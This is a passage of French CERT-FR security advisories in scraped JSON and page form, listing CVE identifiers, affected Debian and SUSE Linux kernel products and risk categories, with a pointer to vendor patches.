"url": "https://www.cve.org/CVERecord?id=CVE-2025-68767"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2025-38248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38248"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-02-13T00:00:00",
"last_revision_date": "2026-02-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0166",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-13T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Debian. Elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un d\u00e9ni de service.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Debian",
"vendor_advisories": [
{
"published_at": "2026-02-09",
"title": "Bulletin de s\u00e9curit\u00e9 Debian DSA-6127-1",
"url": "https://lists.debian.org/debian-security-announce/2026/msg00036.html"
},
{
"published_at": "2026-02-09",
"title": "Bulletin de s\u00e9curit\u00e9 Debian DSA-6126-1",
"url": "https://lists.debian.org/debian-security-announce/2026/msg00035.html"
}
]
}
CERTFR-2026-AVI-0369
Vulnerability from certfr_avis - Published: 2026-03-27 - Updated: 2026-03-27
De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SUSE | Public Cloud Module | Public Cloud Module 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing 15 SP5 | ||
| SUSE | SUSE Linux Enterprise High Availability Extension | SUSE Linux Enterprise High Availability Extension 15 SP4 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing ESPOS 15 SP5 | ||
| SUSE | openSUSE Leap | openSUSE Leap 15.5 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP5 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 12 SP5 LTSS | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP6 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing 12 SP5 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing 15 SP4 | ||
| SUSE | SUSE Manager Retail Branch Server | SUSE Manager Retail Branch Server 4.3 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 12-SP5 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 12 SP5 LTSS Extended Security | ||
| SUSE | openSUSE Leap | openSUSE Leap 15.4 | ||
| SUSE | SUSE Linux Enterprise Desktop | SUSE Linux Enterprise Desktop 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP6 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 12 SP5 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 12 SP5 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.2 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP4 LTSS | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP5 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro for Rancher 5.4 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP5 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing LTSS 15 SP5 | ||
| SUSE | openSUSE Leap | openSUSE Leap 15.6 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.3 | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP5 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro for Rancher 5.3 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP6 | ||
| SUSE | SUSE Linux Enterprise Workstation Extension | SUSE Linux Enterprise Workstation Extension 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP4 | ||
| SUSE | SUSE Manager Proxy | SUSE Manager Proxy 4.3 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro for Rancher 5.2 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP4 | ||
| SUSE | Basesystem Module | Basesystem Module 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Availability Extension | SUSE Linux Enterprise High Availability Extension 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.5 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP6 | ||
| SUSE | SUSE Linux Micro | SUSE Linux Micro 6.1 | ||
| SUSE | Legacy Module | Legacy Module 15-SP7 | ||
| SUSE | SUSE Linux Micro | SUSE Linux Micro 6.0 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP5 LTSS | ||
| SUSE | SUSE Manager Server | SUSE Manager Server 4.3 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP6 LTSS | ||
| SUSE | SUSE Real Time Module | SUSE Real Time Module 15-SP7 | ||
| SUSE | Development Tools Module | Development Tools Module 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Availability Extension | SUSE Linux Enterprise High Availability Extension 15 SP6 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.4 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP4 | ||
| SUSE | SUSE Linux Micro Extras | SUSE Linux Micro Extras 6.0 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Public Cloud Module 15-SP7",
"product": {
"name": "Public Cloud Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP5",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing ESPOS 15 SP5",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.5",
"product": {
"name": "openSUSE Leap",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 12 SP5",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Retail Branch Server 4.3",
"product": {
"name": "SUSE Manager Retail Branch Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 12-SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5 LTSS Extended Security",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.4",
"product": {
"name": "openSUSE Leap",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Desktop 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Desktop",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing LTSS 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.2",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP4 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing LTSS 15 SP5",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Workstation Extension 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Workstation Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Proxy 4.3",
"product": {
"name": "SUSE Manager Proxy",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.2",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Basesystem Module 15-SP7",
"product": {
"name": "Basesystem Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP7",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.5",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.1",
"product": {
"name": "SUSE Linux Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Legacy Module 15-SP7",
"product": {
"name": "Legacy Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.0",
"product": {
"name": "SUSE Linux Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Server 4.3",
"product": {
"name": "SUSE Manager Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Real Time Module 15-SP7",
"product": {
"name": "SUSE Real Time Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Development Tools Module 15-SP7",
"product": {
"name": "Development Tools Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP6",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP4",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro Extras 6.0",
"product": {
"name": "SUSE Linux Micro Extras",
"vendor": {
"name": "SUSE",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-68234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68234"
},
{
"name": "CVE-2025-71075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71075"
},
{
"name": "CVE-2023-54076",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54076"
},
{
"name": "CVE-2026-23198",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23198"
},
{
"name": "CVE-2025-40273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40273"
},
{
"name": "CVE-2023-53714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53714"
},
{
"name": "CVE-2025-68230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68230"
},
{
"name": "CVE-2026-23202",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23202"
},
{
"name": "CVE-2023-54149",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54149"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2023-53797",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53797"
},
{
"name": "CVE-2023-53863",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53863"
},
{
"name": "CVE-2026-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23167"
},
{
"name": "CVE-2025-22083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22083"
},
{
"name": "CVE-2023-54142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54142"
},
{
"name": "CVE-2025-68374",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68374"
},
{
"name": "CVE-2026-23129",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23129"
},
{
"name": "CVE-2023-54000",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54000"
},
{
"name": "CVE-2023-54052",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54052"
},
{
"name": "CVE-2025-68286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68286"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2023-54091",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54091"
},
{
"name": "CVE-2023-54083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54083"
},
{
"name": "CVE-2025-40314",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40314"
},
{
"name": "CVE-2025-40306",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40306"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2023-53821",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53821"
},
{
"name": "CVE-2023-53799",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53799"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2025-40254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40254"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2023-54201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54201"
},
{
"name": "CVE-2025-40219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40219"
},
{
"name": "CVE-2025-68200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68200"
},
{
"name": "CVE-2025-68736",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68736"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68176"
},
{
"name": "CVE-2025-68204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68204"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2026-23269",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23269"
},
{
"name": "CVE-2023-54309",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54309"
},
{
"name": "CVE-2025-68283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68283"
},
{
"name": "CVE-2025-68339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68339"
},
{
"name": "CVE-2025-40287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40287"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2023-53995",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53995"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2023-54255",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54255"
},
{
"name": "CVE-2026-23004",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23004"
},
{
"name": "CVE-2025-71071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71071"
},
{
"name": "CVE-2023-54271",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54271"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68295",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68295"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2023-54297",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54297"
},
{
"name": "CVE-2023-54112",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54112"
},
{
"name": "CVE-2025-68287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68287"
},
{
"name": "CVE-2025-40240",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40240"
},
{
"name": "CVE-2025-71135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71135"
},
{
"name": "CVE-2025-40081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40081"
},
{
"name": "CVE-2023-54313",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54313"
},
{
"name": "CVE-2023-53759",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53759"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2023-53994",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53994"
},
{
"name": "CVE-2025-40153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40153"
},
{
"name": "CVE-2025-40103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40103"
},
{
"name": "CVE-2025-40312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40312"
},
{
"name": "CVE-2023-54095",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54095"
},
{
"name": "CVE-2025-22125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22125"
},
{
"name": "CVE-2025-21738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21738"
},
{
"name": "CVE-2023-54143",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54143"
},
{
"name": "CVE-2025-68238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68238"
},
{
"name": "CVE-2025-68297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68297"
},
{
"name": "CVE-2023-53813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53813"
},
{
"name": "CVE-2023-54227",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54227"
},
{
"name": "CVE-2026-23139",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23139"
},
{
"name": "CVE-2023-53855",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53855"
},
{
"name": "CVE-2026-23208",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23208"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2026-23017",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23017"
},
{
"name": "CVE-2023-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53864"
},
{
"name": "CVE-2025-40350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40350"
},
{
"name": "CVE-2025-40309",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40309"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2025-40349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40349"
},
{
"name": "CVE-2023-54246",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54246"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2026-23179",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23179"
},
{
"name": "CVE-2025-38243",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38243"
},
{
"name": "CVE-2025-40343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40343"
},
{
"name": "CVE-2023-54001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54001"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2026-23035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23035"
},
{
"name": "CVE-2023-54253",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54253"
},
{
"name": "CVE-2026-23210",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23210"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2025-68307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68307"
},
{
"name": "CVE-2025-40308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40308"
},
{
"name": "CVE-2023-54324",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54324"
},
{
"name": "CVE-2023-54106",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54106"
},
{
"name": "CVE-2025-40187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40187"
},
{
"name": "CVE-2025-40315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40315"
},
{
"name": "CVE-2023-53793",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53793"
},
{
"name": "CVE-2023-54096",
